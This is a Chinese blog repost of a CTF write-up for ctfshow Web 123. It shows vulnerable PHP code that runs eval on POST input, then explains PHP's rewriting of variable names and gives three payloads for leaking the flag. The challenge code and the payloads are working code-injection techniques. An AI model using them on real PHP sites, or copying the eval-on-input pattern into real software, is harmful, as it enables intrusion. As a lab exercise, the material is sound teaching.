PHP特性
2022/4/1 1:49:57
本文主要是介绍PHP特性,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
ctfshow Web 123
摘自https://blog.csdn.net/qq_49480008/article/details/113753951,仅作个人收藏学习
1 <?php 2 3 /* 4 # -*- coding: utf-8 -*- 5 # @Author: Firebasky 6 # @Date: 2020-09-05 20:49:30 7 # @Last Modified by: h1xa 8 # @Last Modified time: 2020-09-07 22:02:47 9 # @email: h1xa@ctfer.com 10 # @link: https://ctfer.com 11 12 */ 13 error_reporting(0); 14 highlight_file(__FILE__); 15 include("flag.php"); 16 $a=$_SERVER['argv']; 17 $c=$_POST['fun']; 18 if(isset($_POST['CTF_SHOW'])&&isset($_POST['CTF_SHOW.COM'])&&!isset($_GET['fl0g'])){ 19 if(!preg_match("/\\\\|\/|\~|\`|\!|\@|\#|\%|\^|\*|\-|\+|\=|\{|\}|\"|\'|\,|\.|\;|\?/", $c)&&$c<=18){ 20 eval("$c".";"); 21 if($fl0g==="flag_give_me"){ 22 echo $flag; 23 } 24 } 25 } 26 ?>
分析代码:
if(isset($_POST['CTF_SHOW'])&&isset($_POST['CTF_SHOW.COM'])&&!isset($_GET['fl0g']))
- 1
PHP变量名应该只有数字字母下划线,同时GET或POST方式传进去的变量名,会自动将空格+ . [
转换为_
但是有一个特性可以绕过,使变量名出现.
之类的
特殊字符[
, GET或POST方式传参时,变量名中的[
也会被替换为_
,但其后的字符就不会被替换了
如 CTF[
SHOW.COM=>CTF_
SHOW.COM
$argv
解题过程:
方法一:
构造playload:
get: ?$fl0g=flag_give_me; post: CTF_SHOW=&CTF[SHOW.COM=&fun=eval($a[0])
方法二:
+
隔断argv
构造playload:
get: ?a=1+fl0g=flag_give_me post: CTF_SHOW=&CTF[SHOW.COM=&fun=parse_str($a[1])
注:需用bp
方法三:
构造playload:
CTF_SHOW=&CTF[SHOW.COM=&fun=echo $flag
这篇关于PHP特性的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2024-12-19php8的协程和hyperf的协程有什么区别?-icode9专业技术文章分享
- 2024-12-19php8 的fiber是什么?-icode9专业技术文章分享
- 2024-12-05怎么在php8,1 里面开启 debug?-icode9专业技术文章分享
- 2024-12-05怎么在php8,1 里面开启 debug?-icode9专业技术文章分享
- 2024-11-29使用PHP 将ETH账户的资产汇集到一个账户
- 2024-11-23怎么实现安卓+php 热更新方案?-icode9专业技术文章分享
- 2024-11-22PHP 中怎么实现判断多个值是否为空、null 或者为 false?-icode9专业技术文章分享
- 2024-11-11开源 PHP 商城项目 CRMEB 二次开发和部署教程
- 2024-11-09怎么使用php在kaufland平台刊登商品?-icode9专业技术文章分享
- 2024-11-05PHP的抽象类和接口是什么,有什么区别-icode9专业技术文章分享